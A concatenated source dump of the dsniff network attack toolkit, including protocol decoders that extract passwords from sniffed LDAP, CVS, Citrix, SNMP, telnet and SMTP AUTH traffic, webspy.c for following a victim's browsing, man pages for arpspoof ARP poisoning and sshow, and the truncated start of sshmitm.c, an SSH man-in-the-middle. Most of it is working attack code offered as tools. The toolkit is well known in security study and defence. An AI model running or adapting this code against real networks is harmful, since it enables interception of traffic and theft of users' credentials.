decode_imap }, { "snmp", decode_snmp }, { "ldap", decode_ldap }, { "mmxp", decode_mmxp }, { "https", decode_sni }, { "rlogin", decode_rlogin }, { "rip", decode_rip }, { "socks", decode_socks }, { "citrix", decode_citrix }, { "oracle", decode_oracle }, { "tds", decode_tds }, { "sniffer", decode_sniffer }, { "cvs", decode_cvs }, { "icq", decode_icq }, { "napster", decode_napster }, { "aim", decode_aim }, { "postgresql", decode_postgresql }, { "pcanywhere", decode_pcanywhere }, { "vrrp", decode_vrrp }, { "x11", decode_x11 }, { "irc", decode_irc }, { "portmap", decode_portmap }, { "mountd", decode_mountd }, { "ypserv", decode_ypserv }, { "yppasswd", decode_yppasswd }, { NULL } }; struct _dc_meta dc_meta; // Globally shared. void dc_update(struct _dc_meta *m, const void *buf, size_t len) { if (Opt_show_dups) return; m->crc = crc32_update(buf, len, m->crc); } struct decode * getdecodebyname(const char *name) { struct decode *dc; for (dc = decodes; dc->dc_name != NULL; dc++) { if (strcasecmp(dc->dc_name, name) == 0) return (dc); } return (NULL); } /* Strip telnet options, as well as suboption data. */ int strip_telopts(u_char *buf, int len) { int i, j, subopt = 0; char *p, *q; for (i = j = 0; i < len; i++) { if (buf[i] == IAC) { if (++i >= len) break; else if (buf[i] > SB) i++; else if (buf[i] == SB) { /* XXX - check for autologin username. */ p = buf + i + 1; if ((q = bufbuf(p, len - i, "\xff", 1)) != NULL) { if ((p = bufbuf(p, q - p, "USER\x01", 5)) != NULL) { p += 5; buf[j++] = '['; memcpy(buf + j, p, q - p); j += q - p; buf[j++] = ']'; buf[j++] = '\n'; } } subopt = 1; } else if (buf[i] == SE) { if (!subopt) j = 0; subopt = 0; } } else if (!subopt) { /* XXX - convert isolated returns to newlines. */ if (buf[i] == '\r' && i + 1 < len && buf[i + 1] != '\n') buf[j++] = '\n'; /* XXX - strip binary nulls. */ else if (buf[i] != '\0') buf[j++] = buf[i]; } } buf[j] = '\0'; return (j); } /* Strip a string buffer down to a maximum number of lines. */ int strip_lines(char *buf, int max_lines) { char *p; int lines, nonascii; if (!buf) return (0); lines = nonascii = 0; for (p = buf; *p && lines < max_lines; p++) { if (*p == '\n') lines++; if (!isascii(*p)) nonascii++; } if (*p) *p = '\0'; /* XXX - lame ciphertext heuristic */ if (nonascii * 3 > p - buf) return (0); return (lines); } int is_ascii_string(char *buf, int len) { int i; for (i = 0; i < len; i++) if (!isascii(buf[i])) return (0); return (1); } u_char * bufbuf(u_char *big, int blen, u_char *little, int llen) { u_char *p; for (p = big; p <= big + blen - llen; p++) { if (memcmp(p, little, llen) == 0) return (p); } return (NULL); } // WARNING: sz must be >= 1 u_char * ascii_string(u_char *buf, int sz) { u_char *end = buf + sz; u_char *ptr = buf; while (ptr < end) { if (*ptr == 0x0d) break; if (*ptr == 0x0a) break; if (*ptr == 0x00) break; if (!isascii(*ptr)) { *ptr = '?'; } ptr++; } if (ptr >= end) ptr--; if (*ptr != 0x00) *ptr = '\0'; return buf; } u_char * color_domain(u_char *dst, size_t dsz, u_char *src) { int n = 0; u_char *end = src + strlen(src); int is_ip = 1; while ((n < 2) && (src < end--)) { if (*end == '.') { n++; continue; } if (!((*end >= '0') && (*end <= '9'))) is_ip = 0; } if ((!is_ip) && (n >= 2)) { *end = '\0'; snprintf(dst, dsz, CM "%s"CDM ".%s"CN, src, end + 1); // snprintf(dst, dsz, CM CUL"%s"CDM CUL".%s"CN, src, end + 1); } else snprintf(dst, dsz, CDM "%s"CN, src); // snprintf(dst, dsz, CDM CUL"%s"CN, src); return dst; } struct _ip_colors { char *pre; char *mid; char *suf; }; struct _ip_colors ipcol[] = { {CDC, CC CF, CN CC}, {CDR, CR CF, CN CR}, {CDG, CG CF, CN CG}, {CDB, CB CF, CN CB}, {CDY, CY CF, CN CY}, {CDM, CM CF, CN CM} }; #ifndef int_ntoa # define int_ntoa(x) inet_ntoa(*((struct in_addr *)&x)) #endif // Assign a random color scheme to an IP. u_char * color_ip(u_char *dst, size_t dsz, in_addr_t ip) { char *pre, *suf, *mid; char *src = int_ntoa(ip); char *end = src + strlen(src); char *pos[3]; int n = 3; while ((n > 0) && (src < end--)) { if (*end != '.') continue; pos[--n] = end; } if (n > 0) { // Not '3' dots. Not an IPv4 snprintf(dst, dsz, "%d %s", n, src); return dst; } // Pick color by /24 struct _ip_colors *ipc = &ipcol[crc32(&ip, 3) % (sizeof ipcol / sizeof *ipcol)]; *pos[0] = *pos[2] = '\0'; snprintf(dst, dsz, "%s%s.%s%s.%s%s"CN, ipc->pre, src, ipc->mid, pos[0] + 1, ipc->suf, pos[2] + 1); return dst; } int decode_authplain(u_char *p, char **userp, char **passwordp) { int i, j, n; u_char *s; j = base64_pton(p, p, strlen(p)); p[j] = '\0'; n = 0; s = p; /* p consists of three parts, divided by \0 */ while (s <= &p[j] && n<=3) { if (n == 0) { /* we do not process this portion yet */ } else if (n == 1) { *userp = (char *)s; } else if (n == 2) { *passwordp = (char *)s; return 0; } n++; while (*s) s++; s++; } return -1; } hackerschoice-dsniff-a17510d/TODO0000664000175000017500000000060315105626144016501 0ustar epsilonepsilon$Id: TODO,v 1.2 2000/12/02 06:29:30 dugsong Exp $ - finish conversion to buf interface - rework half-duplex tcp_raw reassembly, for *snarf [-c] - NTLM handling in telnet, FTP, HTTP, SMB, NNTP, etc. non-trivial since dsniff only examines client traffic :-/ - arpspoof [host ...] - more protocols: atalk, MAPI, etc.? - reverse more of AOL's OSCAR protocol for dsniff and msgsnarf hackerschoice-dsniff-a17510d/decode_snmp.c0000664000175000017500000000204415105626144020436 0ustar epsilonepsilon/* * decode_snmp.c * * Simple Network Management Protocol. * * Copyright (c) 2000 Dug Song * * $Id: decode_snmp.c,v 1.6 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include #include "buf.h" #include "asn1.h" #include "decode.h" int decode_snmp(u_char *buf, int len, u_char *obuf, int olen) { struct buf *b, inbuf, outbuf; u_char *p, vers; int i; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); if (asn1_type(&inbuf) != ASN1_SEQUENCE) return (0); asn1_len(&inbuf); /* XXX - skip sequence length */ if (asn1_type(&inbuf) != ASN1_INTEGER) return (0); if (asn1_len(&inbuf) != 1) /* XXX - check version length */ return (0); buf_get(&inbuf, &vers, sizeof(vers)); if (asn1_type(&inbuf) != ASN1_STRING) return (0); i = asn1_len(&inbuf); b = buf_tok(&inbuf, NULL, i); p = buf_strdup(b); buf_putf(&outbuf, "[version %d]\n%s\n", vers + 1, p); free(p); buf_end(&outbuf); return (buf_len(&outbuf)); } hackerschoice-dsniff-a17510d/vroot.h0000664000175000017500000001150215105626144017333 0ustar epsilonepsilon/*****************************************************************************/ /** Copyright 1991 by Andreas Stolcke **/ /** Copyright 1990 by Solbourne Computer Inc. **/ /** Longmont, Colorado **/ /** **/ /** All Rights Reserved **/ /** **/ /** Permission to use, copy, modify, and distribute this software and **/ /** its documentation for any purpose and without fee is hereby **/ /** granted, provided that the above copyright notice appear in all **/ /** copies and that both that copyright notice and this permis- **/ /** sion notice appear in supporting documentation, and that the **/ /** name of Solbourne not be used in advertising **/ /** in publicity pertaining to distribution of the software without **/ /** specific, written prior permission. **/ /** **/ /** ANDREAS STOLCKE AND SOLBOURNE COMPUTER INC. DISCLAIMS ALL WARRANTIES **/ /** WITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF **/ /** MERCHANTABILITY AND FITNESS, IN NO EVENT SHALL ANDREAS STOLCKE **/ /** OR SOLBOURNE BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL **/ /** DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA **/ /** OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER **/ /** TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE **/ /** OR PERFORMANCE OF THIS SOFTWARE. **/ /*****************************************************************************/ /* * vroot.h -- Virtual Root Window handling header file * * This header file redefines the X11 macros RootWindow and DefaultRootWindow, * making them look for a virtual root window as provided by certain `virtual' * window managers like swm and tvtwm. If none is found, the ordinary root * window is returned, thus retaining backward compatibility with standard * window managers. * The function implementing the virtual root lookup remembers the result of * its last invocation to avoid overhead in the case of repeated calls * on the same display and screen arguments. * The lookup code itself is taken from Tom LaStrange's ssetroot program. * * Most simple root window changing X programs can be converted to using * virtual roots by just including * * #include * * after all the X11 header files. It has been tested on such popular * X clients as xphoon, xfroot, xloadimage, and xaqua. * It also works with the core clients xprop, xwininfo, xwd, and editres * (and is necessary to get those clients working under tvtwm). * It does NOT work with xsetroot; get the xsetroot replacement included in * the tvtwm distribution instead. * * Andreas Stolcke , 9/7/90 * - replaced all NULL's with properly cast 0's, 5/6/91 * - free children list (suggested by Mark Martin ), 5/16/91 * - include X11/Xlib.h and support RootWindowOfScreen, too 9/17/91 */ #ifndef _VROOT_H_ #define _VROOT_H_ #include #include #include static Window VirtualRootWindowOfScreen(screen) Screen *screen; { static Screen *save_screen = (Screen *)0; static Window root = (Window)0; if (screen != save_screen) { Display *dpy = DisplayOfScreen(screen); Atom __SWM_VROOT = None; int i; Window rootReturn, parentReturn, *children; unsigned int numChildren; root = RootWindowOfScreen(screen); /* go look for a virtual root */ __SWM_VROOT = XInternAtom(dpy, "__SWM_VROOT", False); if (XQueryTree(dpy, root, &rootReturn, &parentReturn, &children, &numChildren)) { for (i = 0; i < numChildren; i++) { Atom actual_type; int actual_format; unsigned long nitems, bytesafter; Window *newRoot = (Window *)0; if (XGetWindowProperty(dpy, children[i], __SWM_VROOT, 0, 1, False, XA_WINDOW, &actual_type, &actual_format, &nitems, &bytesafter, (unsigned char **) &newRoot) == Success && newRoot) { root = *newRoot; break; } } if (children) XFree((char *)children); } save_screen = screen; } return root; } #undef RootWindowOfScreen #define RootWindowOfScreen(s) VirtualRootWindowOfScreen(s) #undef RootWindow #define RootWindow(dpy,screen) VirtualRootWindowOfScreen(ScreenOfDisplay(dpy,screen)) #undef DefaultRootWindow #define DefaultRootWindow(dpy) VirtualRootWindowOfScreen(DefaultScreenOfDisplay(dpy)) #endif /* _VROOT_H_ */ hackerschoice-dsniff-a17510d/record.h0000664000175000017500000000065015105626144017442 0ustar epsilonepsilon/* * record.h * * Record interface. * * Copyright (c) 2000 Dug Song * * $Id: record.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef RECORD_H #define RECORD_H int record_init(char *file); int record(u_int32_t src, u_int32_t dst, int proto, u_short sport, u_short dport, char *name, u_char *buf, int len); void record_dump(void); void record_close(void); #endif /* RECORD_H */ hackerschoice-dsniff-a17510d/sshow.80000664000175000017500000000173315105626144017252 0ustar epsilonepsilon.TH SSHOW 8 .ad .fi .SH NAME sshow \- SSH traffic analysis tool .SH SYNOPSIS .na .nf .fi \fBsshow\fR [\fB-d\fR] [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [\fIexpression\fR] .SH DESCRIPTION .ad .fi \fBsshow\fR analyzes encrypted SSH-1 and SSH-2 traffic, identifying authentication attempts, the lengths of passwords entered in interactive sessions, and command line lengths. .LP The following advisory describes the attacks implemented by \fBsshow\fR in detail: .LP .RS .I http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt .RE .SH OPTIONS .IP \fB-d\fR Enable verbose debugging output. .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP "\fB-p \fIpcapfile\fR" Process packets from the specified PCAP capture file instead of the network. .IP "\fIexpression\fR" Specify a tcpdump(8) filter expression to select traffic to sniff. .SH "SEE ALSO" dsniff(8), sshmitm(8) .SH AUTHORS .na .nf Solar Designer Dug Song hackerschoice-dsniff-a17510d/webspy.c0000664000175000017500000001172315105626144017473 0ustar epsilonepsilon/* * webspy.c * * Sniff a user's web session, follow it real-time in our browser. * * Copyright (c) 1999 Dug Song * * $Id: webspy.c,v 1.28 2001/03/15 08:33:05 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include "base64.h" #include "buf.h" /* for jwz's remote.c. */ extern int mozilla_remote_commands (Display *, Window, char **); char *expected_mozilla_version = "4.7"; char *progname = "webspy"; static libnet_t *l; Display *dpy; char cmd[2048], *cmdtab[2]; in_addr_t host; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: %s [-i interface | -p pcapfile] host\n", progname); exit(1); } static int is_display_uri(char *uri) { static char *good_prefixes[] = { NULL }; static char *good_suffixes[] = { ".html", ".htm", "/", ".shtml", ".cgi", ".asp", ".php3", ".txt", ".xml", ".asc", NULL }; int len, slen; char **pp, *p; /* Get URI length, without QUERY_INFO */ if ((p = strchr(uri, '?')) != NULL) { len = p - uri; } else len = strlen(uri); for (pp = good_suffixes; *pp != NULL; pp++) { if (len < (slen = strlen(*pp))) continue; if (strncasecmp(&uri[len - slen], *pp, slen) == 0) return (1); } for (pp = good_prefixes; *pp != NULL; pp++) { if (len < (slen = strlen(*pp))) continue; if (strncasecmp(uri, *pp, slen) == 0) return (1); } return (0); } /* XXX - we should really be sniffing (and HTML-parsing) the returned pages, not just the request URLs. this is why we don't handle frames, some CGIs, banner ads, etc. correctly. */ static int process_http_request(struct tuple4 *addr, u_char *data, int len) { struct buf *msg, buf; char *p, *req, *uri, *vhost, *auth; int i; buf_init(&buf, data, len); while ((i = buf_index(&buf, "\r\n\r\n", 4)) >= 0) { msg = buf_tok(&buf, NULL, i); msg->base[msg->end] = '\0'; buf_skip(&buf, 4); req = strtok(buf_ptr(msg), "\r\n"); if (strncmp(req, "GET ", 4) != 0 && strncmp(req, "POST ", 5) != 0 && strncmp(req, "CONNECT ", 8) != 0) continue; vhost = auth = NULL; uri = strchr(req, ' '); *uri++ = '\0'; strtok(uri, " "); if (strncmp(uri, "http://", 7) == 0) { vhost = uri + 7; uri = strchr(vhost, '/'); memmove(uri + 1, uri, strlen(uri)); } if (!is_display_uri(uri)) continue; while ((p = strtok(NULL, "\r\n")) != NULL) { if (strncasecmp(p, "Authorization: Basic ", 21) == 0) { p += 21; i = base64_pton(p, p, strlen(p)); p[i] = '\0'; auth = p; } else if (strncasecmp(p, "Host: ", 6) == 0) { vhost = p + 6; } } if (auth == NULL) auth = ""; if (vhost == NULL) vhost = libnet_addr2name4(addr->daddr, 0); snprintf(cmd, sizeof(cmd), "openURL(http://%s%s%s%s)", auth, *auth ? "@" : "", vhost, uri); fprintf(stderr, "%s\n", cmd); mozilla_remote_commands(dpy, 0, cmdtab); } return (len - buf_len(&buf)); } static void sniff_http_client(struct tcp_stream *ts, void **yoda) { int i; /* Only handle HTTP client traffic. */ if (ts->addr.saddr != host || (ts->addr.dest != 80 && ts->addr.dest != 3128 && ts->addr.dest != 8080)) return; switch (ts->nids_state) { case NIDS_JUST_EST: /* Collect data. */ ts->server.collect = 1; case NIDS_DATA: if (ts->server.count_new != 0) { i = process_http_request(&ts->addr, ts->server.data, ts->server.count - ts->server.offset); nids_discard(ts, i); } break; default: if (ts->server.count != 0) { process_http_request(&ts->addr, ts->server.data, ts->server.count - ts->server.offset); } break; } } static void null_syslog(int type, int errnum, struct ip *iph, void *data) { } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; char libnet_ebuf[LIBNET_ERRBUF_SIZE]; while ((c = getopt(argc, argv, "i:p:h?V")) != -1) { switch (c) { case 'i': nids_params.device = optarg; break; case 'p': nids_params.filename = optarg; break; default: usage(); } } argc -= optind; argv += optind; if (argc != 1) usage(); cmdtab[0] = cmd; cmdtab[1] = NULL; if ((l = libnet_init(LIBNET_LINK, NULL, libnet_ebuf)) == NULL) errx(1, "%s", libnet_ebuf); if ((host = libnet_name2addr4(l, argv[0], LIBNET_RESOLVE)) == -1) errx(1, "unknown host"); if ((dpy = XOpenDisplay(NULL)) == NULL) errx(1, "connection to local X server failed!"); nids_params.scan_num_hosts = 0; nids_params.syslog = null_syslog; if (!nids_init()) errx(1, "%s", nids_errbuf); nids_register_tcp(sniff_http_client); if (nids_params.filename == NULL) { warnx("listening on %s", nids_params.device); } else { warnx("using %s", nids_params.filename); } nids_run(); /* NOTREACHED */ exit(0); } hackerschoice-dsniff-a17510d/dsniff.services0000664000175000017500000000216315105626144021032 0ustar epsilonepsilon# $Id: dsniff.services,v 1.8 2000/12/15 20:10:58 dugsong Exp $ # # Network services, dsniff style # ftp 21/tcp ssh 22/tcp telnet 23/tcp smtp 25/tcp pptp 47/ip http 80/tcp ospf 89/ip http 98/tcp poppass 106/tcp pop2 109/tcp pop3 110/tcp portmap 111/tcp portmap -111/tcp portmap 111/udp portmap -111/udp vrrp 112/ip nntp 119/tcp smb 139/tcp imap 143/tcp snmp 161/udp imap 220/tcp telnet 261/tcp ldap 389/tcp mmxp 417/tcp mmxp 417/udp https 443/tcp rlogin 512/tcp rlogin 513/tcp rlogin 514/tcp rip 520/udp smtp 587/tcp socks 1080/tcp tds 1433/tcp tds 1433/udp citrix 1494/tcp oracle 1521/tcp oracle 1526/tcp sniffer 2001/udp cvs 2401/tcp mmxp 2417/tcp mmxp 2417/udp tds 2638/tcp http 3128/tcp icq 4000/udp napster 4444/tcp aim 5190/tcp postgresql 5432/tcp napster 5555/tcp pcanywhere 5631/tcp x11 6000/tcp x11 6001/tcp x11 6002/tcp x11 6003/tcp x11 6004/tcp x11 6005/tcp napster 6666/tcp irc 6667/tcp irc 6668/tcp irc 6669/tcp tds 7599/tcp napster 7777/tcp http 8080/tcp napster 8888/tcp aim 9898/tcp pcanywhere 65301/tcp mountd 100005/rpc ypserv 100004/rpc yppasswd 100009/rpc hackerschoice-dsniff-a17510d/decode_ldap.c0000664000175000017500000000330215105626144020377 0ustar epsilonepsilon/* * decode_ldap.c * * Lightweight Directory Access Protocol. * * Copyright (c) 2000 Dug Song * * $Id: decode_ldap.c,v 1.5 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "asn1.h" #include "decode.h" int decode_ldap(u_char *buf, int len, u_char *obuf, int olen) { struct buf *msg, inbuf, outbuf; int i, type; u_char *p; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); while (buf_len(&inbuf) > 10) { /* LDAPMessage */ type = asn1_type(&inbuf); i = asn1_len(&inbuf); if (i <= 0 || (msg = buf_tok(&inbuf, NULL, i)) == NULL) break; if (type != ASN1_SEQUENCE) continue; /* messageID */ type = asn1_type(msg); i = asn1_len(msg); if (type != ASN1_INTEGER || i <= 0 || buf_skip(msg, i) < 0) continue; /* bindRequest op - APPLICATION[0] SEQUENCE */ if (buf_cmp(msg, "\x60", 1) != 0) continue; asn1_type(msg); asn1_len(msg); /* version */ type = asn1_type(msg); i = asn1_len(msg); if (type != ASN1_INTEGER || i <= 0 || buf_skip(msg, i) < 0) continue; /* name */ type = asn1_type(msg); i = asn1_len(msg); p = buf_ptr(msg); if (type != ASN1_STRING || i <= 0 || buf_skip(msg, i) < 0) continue; /* simple auth [0] */ if (buf_cmp(msg, "\x80", 1) != 0) continue; *(buf_ptr(msg)) = '\0'; buf_skip(msg, 1); /* passwd */ i = asn1_len(msg); if (i <= 0 || i > buf_len(msg)) continue; if (buf_tell(&outbuf) > 0) buf_put(&outbuf, "\n", 1); buf_putf(&outbuf, "%s\n", p); buf_put(&outbuf, buf_ptr(msg), i); buf_put(&outbuf, "\n", 1); } buf_end(&outbuf); return (buf_len(&outbuf)); } hackerschoice-dsniff-a17510d/arpspoof.80000664000175000017500000000300015105626144017725 0ustar epsilonepsilon.TH ARPSPOOF 8 .ad .fi .SH NAME arpspoof \- intercept packets on a switched LAN .SH SYNOPSIS .na .nf .fi \fBarpspoof\fR [\fB\-i \fIinterface\fR] [\fB\-c \fIown|host|both\fR] [\fB\-t \fItarget\fR] [\fB\-r\fR] \fIhost\fR .SH DESCRIPTION .ad .fi \fBarpspoof\fR redirects packets from a target host (or all hosts) on the LAN intended for another host on the LAN by forging ARP replies. This is an extremely effective way of sniffing traffic on a switch. .LP Kernel IP forwarding (or a userland program which accomplishes the same, e.g. fragrouter(8)) must be turned on ahead of time. .SH OPTIONS .IP "\fB-i \fIinterface\fR" Specify the interface to use. .IP "\fB-c \fIown|host|both\fR" Specify which hardware address t use when restoring the arp configuration; while cleaning up, packets can be send with the own address as well as with the address of the host. Sending packets with a fake hw address can disrupt connectivity with certain switch/ap/bridge configurations, however it works more reliably than using the own address, which is the default way arpspoof cleans up afterwards. .IP "\fB-t \fItarget\fR" Specify a particular host to ARP poison (if not specified, all hosts on the LAN). Repeat to specify multiple hosts. .IP "\fB\-r\fR" Poison both hosts (host and target) to capture traffic in both directions. (only valid in conjuntion with \-t) .IP \fIhost\fR Specify the host you wish to intercept packets for (usually the local gateway). .SH "SEE ALSO" dsniff(8), fragrouter(8) .SH AUTHOR .na .nf Dug Song hackerschoice-dsniff-a17510d/env2argv.c0000664000175000017500000000246615105626144017720 0ustar epsilonepsilon#include "config.h" #include #include #include #include "env2argv.h" #define ARGS_NAME "ENV_ARGS" // Add list of argv's from environment to argv[]. // Result: argv[0] + ENV_ARGS[@] + argv[1..n] void env2argv(int *argcptr, char **argvptr[]) { char *str_orig = getenv(ARGS_NAME); char *str = NULL; char *next; char **newargv = NULL; int newargc = 0; if ((str_orig == NULL) || (*str_orig == '\0')) return; str = strdup(str_orig); next = str; newargv = malloc(1 * sizeof *argvptr); memcpy(&newargv[0], argvptr[0], 1 * sizeof *argvptr); newargc = 1; while (next != NULL) { while (*str == ' ') str++; next = strchr(str, ' '); if (next != NULL) { *next = 0; next++; } // catch if last character is ' ' if (strlen(str) > 0) { /* *next == '\0'; str points to argument (0-terminated) */ newargc++; // DEBUGF("%d. arg = '%s'\n", newargc, str); newargv = realloc(newargv, newargc * sizeof newargv); newargv[newargc - 1] = str; } str = next; if (str == NULL) break; } // Copy original argv[1..n] newargv = realloc(newargv, (newargc + *argcptr) * sizeof newargv); memcpy(newargv + newargc, *argvptr + 1, (*argcptr - 1) * sizeof *argvptr); newargc += (*argcptr - 1); newargv[newargc] = NULL; *argcptr = newargc; *argvptr = newargv; }hackerschoice-dsniff-a17510d/decode_citrix.c0000664000175000017500000000252615105626144020770 0ustar epsilonepsilon/* * decode_citrix.c * * Citrix ICA. * * http://www.securityfocus.com/templates/archive.pike?list=1&date=200 \ * 0-04-15&msg=Pine.BSO.4.20.0003290949280.2640-100000@naughty.monkey.org * * Thanks to Jeremie Kass for providing me with * traffic traces. * * Copyright (c) 2000 Dug Song * * $Id: decode_citrix.c,v 1.5 2001/03/15 08:32:59 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "decode.h" static u_char ica_magic[] = { 0x32, 0x26, 0x85, 0x92, 0x58 }; int decode_citrix(u_char *buf, int len, u_char *obuf, int olen) { struct buf inbuf, outbuf; u_char key, c, t[2]; int i; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); while ((i = buf_index(&inbuf, ica_magic, sizeof(ica_magic))) >= 0) { buf_skip(&inbuf, i); if (buf_len(&inbuf) < 60) break; buf_skip(&inbuf, 17); if (buf_get(&inbuf, &key, 1) != 1) break; buf_skip(&inbuf, 42); if (buf_get(&inbuf, &c, 1) != 1) break; c ^= ('C' | key); buf_put(&outbuf, &c, 1); i = 0; while (buf_get(&inbuf, t, 2) == 2) { c = t[0] ^ t[1] ^ key; if (c == '\0') { buf_put(&outbuf, "\n", 1); if (++i > 2) break; } buf_put(&outbuf, &c, 1); } } buf_end(&outbuf); return (buf_len(&outbuf)); } hackerschoice-dsniff-a17510d/decode_cvs.c0000664000175000017500000000411115105626144020251 0ustar epsilonepsilon/* * decode_cvs.c * * Concurrent Versions System. * * Copyright (c) 2000 Dug Song * * $Id: decode_cvs.c,v 1.6 2001/03/15 08:32:59 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "decode.h" /* stolen from CVS scramble.c */ static u_char cvs_shifts[] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 114,120, 53, 79, 96,109, 72,108, 70, 64, 76, 67,116, 74, 68, 87, 111, 52, 75,119, 49, 34, 82, 81, 95, 65,112, 86,118,110,122,105, 41, 57, 83, 43, 46,102, 40, 89, 38,103, 45, 50, 42,123, 91, 35, 125, 55, 54, 66,124,126, 59, 47, 92, 71,115, 78, 88,107,106, 56, 36,121,117,104,101,100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48, 58,113, 32, 90, 44, 98, 60, 51, 33, 97, 62, 77, 84, 80, 85,223, 225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190, 199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193, 174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212, 207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246, 192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176, 227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127, 182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195, 243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152 }; int decode_cvs(u_char *buf, int len, u_char *obuf, int olen) { struct buf *line, inbuf, outbuf; u_char *p; int i, n; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); if (buf_cmp(&inbuf, "BEGIN ", 6) != 0) return (0); for (n = 0; n < 5 && (i = buf_index(&inbuf, "\n", 1)) != -1; n++) { line = buf_tok(&inbuf, NULL, i + 1); line->base[line->end - 1] = '\0'; p = buf_ptr(line); buf_putf(&outbuf, "%s", p); if (n == 3) { if (p[0] != 'A') return (0); for (i = 1; i < sizeof(cvs_shifts) - 1 && p[i]; i++) p[i] = cvs_shifts[p[i]]; buf_putf(&outbuf, " [%s]", p + 1); } buf_put(&outbuf, "\n", 1); } buf_end(&outbuf); return (buf_len(&outbuf)); } hackerschoice-dsniff-a17510d/sshmitm.c0000664000175000017500000002043415105626144017645 0ustar epsilonepsilon/* * sshmitm.c * * SSH monkey-in-the-middle. * * Copyright (c) 2000 Dug Song * * $Id: sshmitm.c,v 1.7 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "buf.h" #include "record.h" #include "sshcrypto.h" #include "ssh.h" #define MAX_LINES 6 #define MIN_SNAPLEN 1024 int Opt_debug = 0; int Opt_interact = 0; u_short Opt_dns = 0; int Opt_magic = 0; int Opt_read = 0; int Opt_write = 0; int Opt_snaplen = MIN_SNAPLEN; int Opt_lines = MAX_LINES; int Opt_verbose = 0; int Opt_show_dups = 0; int Opt_color = 0; int mitm_fd; int client_fd, server_fd; SSH_CTX *ssh_client_ctx, *ssh_server_ctx; SSH *ssh_client, *ssh_server; struct sockaddr_in csin, ssin; int sig_pipe[2]; static libnet_t *l; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: sshmitm [-d] [-I] [-p port] host [port]\n"); exit(1); } static void ssh_strlcat(char *dst, int size, char *src, int len) { char *p; u_int32_t i; for (p = dst; *p != '\0'; p++) ; size -= (p - dst - 1); GETLONG(i, src); i = MIN(i, len); i = MIN(i, size); memcpy(p, src, i); p[i] = '\0'; } static void sig_chld(int signal) { if (write(sig_pipe[1], "x", 1) == -1) warn("sig_chld"); } static void sig_int(int signal) { close(mitm_fd); record_close(); exit(0); } static void reap_child(void) { pid_t pid, status; while ((pid = waitpid(-1, &status, WNOHANG)) > 0) { if (Opt_debug) warnx("child %d terminated with status %d", pid, status); } } static void mitm_init(u_short lport, u_long ip, u_short rport) { int i = 1; if (pipe(sig_pipe) == -1) err(1, "pipe"); if ((mitm_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1) err(1, "socket"); if (setsockopt(mitm_fd, SOL_SOCKET, SO_REUSEADDR, &i, sizeof(i)) == -1) err(1, "setsockopt"); memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = INADDR_ANY; ssin.sin_port = htons(lport); if (bind(mitm_fd, (struct sockaddr *)&ssin, sizeof(ssin)) == -1) err(1, "bind"); if (listen(mitm_fd, 3) == -1) err(1, "listen"); ssin.sin_addr.s_addr = ip; ssin.sin_port = htons(rport); SSH_init(); ssh_client_ctx = SSH_CTX_new(); ssh_client_ctx->hostkey = RSA_generate_key(1024, 35, NULL, NULL); ssh_client_ctx->servkey = RSA_generate_key(768, 35, NULL, NULL); if (ssh_client_ctx->hostkey == NULL || ssh_client_ctx->servkey == NULL) { errx(1, "RSA key generation failed"); } } static void mitm_child(void) { u_char buf[SSH_MAX_PKTLEN]; char userpass[1024]; fd_set fds; int i, pass_done, hijack_done; if (Opt_debug) warnx("new connection from %s.%d", inet_ntoa(csin.sin_addr), ntohs(csin.sin_port)); if (fcntl(client_fd, F_SETFL, 0) == -1) err(1, "fcntl"); /* Connect to real server. */ if ((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1) err(1, "socket"); if (connect(server_fd, (struct sockaddr *)&ssin, sizeof(ssin)) == -1) err(1, "connect"); /* Relay version strings. */ if ((i = read(server_fd, buf, sizeof(buf))) <= 0 || buf[i - 1] != '\n') errx(1, "bad version string from server"); if (write(client_fd, buf, i) != i) err(1, "write"); if ((i = read(client_fd, buf, sizeof(buf))) <= 0 || buf[i - 1] != '\n') errx(1, "bad version string from client"); if (write(server_fd, buf, i) != i) err(1, "write"); /* Perform server key exchange. */ if ((ssh_server_ctx = SSH_CTX_new()) == NULL || (ssh_server = SSH_new(ssh_server_ctx)) == NULL) err(1, "malloc"); SSH_set_fd(ssh_server, server_fd); if (SSH_connect(ssh_server) == -1) errx(1, "server key exchange failed"); /* Perform client key exchange. */ if ((ssh_client = 